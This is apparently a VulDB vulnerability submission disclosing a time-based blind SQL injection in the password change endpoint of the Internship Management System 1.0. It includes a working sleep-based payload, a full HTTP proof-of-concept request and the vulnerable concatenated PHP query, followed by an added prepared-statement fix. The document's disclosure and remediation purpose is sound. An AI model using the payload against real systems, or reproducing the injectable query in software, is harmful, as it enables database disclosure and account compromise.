Submission #846890: Internship Portal file `employer/details/change_password.php` contains a Time-Based Blind SQL Injection vulnerability v1.0 SQL Injection

Title: Internship Portal file `employer/details/change_password.php` contains a Time-Based Blind SQL Injection vulnerability v1.0 SQL Injection
Description:

## Internship Portal file `employer/details/change_password.php` contains a Time-Based Blind SQL Injection vulnerability

### Impact of the vulnerability

An authenticated employer user can inject SQL syntax into the `current` parameter of the password change endpoint. Because the application concatenates untrusted input directly into the SQL query used to verify the current password, an attacker can trigger database-side delays and confirm SQL injection through response timing. This may lead to:

- Database information disclosure through blind inference
- Authentication logic abuse
- Further compromise of account-related data

### Payload:

```text
Shar8850'and(select*from(select+sleep(10))a/**/union/**/select+1)='
```

### POC:

The vulnerable endpoint is `POST /employer/myaccount.php?change_password`. The injection point is the multipart form field `current`, which is used directly in the SQL statement inside `employer/details/change_password.php`:

```php
$current_password = $_POST['current'];
$sqlPass = "SELECT * FROM employer WHERE password = '$current_password' AND email = '$email'";
```

Send the following request:

```http
POST /employer/myaccount.php?change_password HTTP/1.1
Host: internship
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaMukpDDqEfNqt7xg
Cookie: PHPSESSID=qithgp1m1at8bieavidf4ddlnc

------WebKitFormBoundaryaMukpDDqEfNqt7xg
Content-Disposition: form-data; name="current"

Shar8850'and(select*from(select+sleep(10))a/**/union/**/select+1)='
------WebKitFormBoundaryaMukpDDqEfNqt7xg
Content-Disposition: form-data; name="new"

Shar8850
------WebKitFormBoundaryaMukpDDqEfNqt7xg
Content-Disposition: form-data; name="confirm"

Shar8850
------WebKitFormBoundaryaMukpDDqEfNqt7xg
Content-Disposition: form-data; name="update_password"

------WebKitFormBoundaryaMukpDDqEfNqt7xg--
```

Expected result: the server response is delayed by about 10 seconds, indicating that the injected `sleep(10)` function was executed by the database. This confirms a time-based blind SQL injection vulnerability in the `current` parameter of the employer password change feature.

### Notes:

- This endpoint requires a valid logged-in employer session.
- The vulnerable source file is `employer/details/change_password.php`.
- The issue exists because user input is concatenated into SQL without prepared statements or parameter binding.

### Sources download:

```text
https://code-projects.org/internship-management-system-in-php-with-source-code/
```

[Internship Management System In PHP With Source Code - Source Code & Projects](https://code-projects.org/internship-management-system-in-php-with-source-code/)
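The following is an added example of how the current-password check can be rewritten with prepared statements; it is not code from the Internship Management System or from the submitter. It assumes a mysqli connection in `$conn`, the logged-in employer's e-mail in `$email` (as in the original query), and the `employer` table with `password` and `email` columns; the form field names `current`, `new`, `confirm` and `update_password` are the ones used in the POC request.

```php
<?php
// Added example (not the project's code): hardened replacement for the
// current-password check in employer/details/change_password.php.
// Assumptions: $conn is a mysqli connection, $email is the logged-in employer's
// e-mail, and the `employer` table has `password` and `email` columns.

function verify_current_password(mysqli $conn, string $email, string $current): bool
{
    // Look the row up by e-mail only, through a prepared statement. The submitted
    // password is bound as a parameter and never interpolated into SQL, so the
    // "...'and(select*from(select+sleep(10))a/**/union/**/select+1)='" payload
    // is just a string that fails to match.
    $stmt = $conn->prepare('SELECT password FROM employer WHERE email = ? LIMIT 1');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $conn->error);
    }
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $stmt->bind_result($stored);
    $found = $stmt->fetch();
    $stmt->close();
    if (!$found) {
        return false;
    }

    // If the column already holds password_hash() output, verify it properly.
    // Assumption: the original query compares the raw submitted value, so existing
    // rows may be plaintext; compare those in constant time and let the update
    // below replace them with a hash.
    if (!empty(password_get_info($stored)['algo'])) {
        return password_verify($current, $stored);
    }
    return hash_equals($stored, $current);
}

function update_password(mysqli $conn, string $email, string $new): bool
{
    $hash = password_hash($new, PASSWORD_DEFAULT);
    $stmt = $conn->prepare('UPDATE employer SET password = ? WHERE email = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $conn->error);
    }
    $stmt->bind_param('ss', $hash, $email);
    $ok = $stmt->execute() && $stmt->affected_rows === 1;
    $stmt->close();
    return $ok;
}

// Handler for the form fields shown in the POC (current, new, confirm, update_password).
if (isset($_POST['update_password'])) {
    $current = (string) ($_POST['current'] ?? '');
    $new     = (string) ($_POST['new'] ?? '');
    $confirm = (string) ($_POST['confirm'] ?? '');

    if ($new === '' || $new !== $confirm) {
        $message = 'New password and confirmation do not match.';
    } elseif (!verify_current_password($conn, $email, $current)) {
        $message = 'Current password is incorrect.';
    } elseif (update_password($conn, $email, $new)) {
        $message = 'Password updated.';
    } else {
        $message = 'Password update failed.';
    }
}
```

To confirm the fix, replay the POC request above: the response should come back without the roughly 10-second delay and report an incorrect current password. When running the timing check in general, compare against a baseline request and vary the `sleep()` value, so that network latency is not mistaken for injection.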
Source: https://github.com/zzzxc643/CVE1/blob/main/assessment/vul8.md
User: SSL_Seven_Security_Lab_WangZhiQiang_ZhanXiuChen (UID 97200)
Submitted: 2026-06-03 16:01 (1 month ago)
Moderated: 2026-07-04 07:24 (1 month later)
Status: Accepted
VulDB Entry: 376297 [code-projects Internship Management System 1.0 Password Change Endpoint change_password.php current SQL injection]
Points: 20
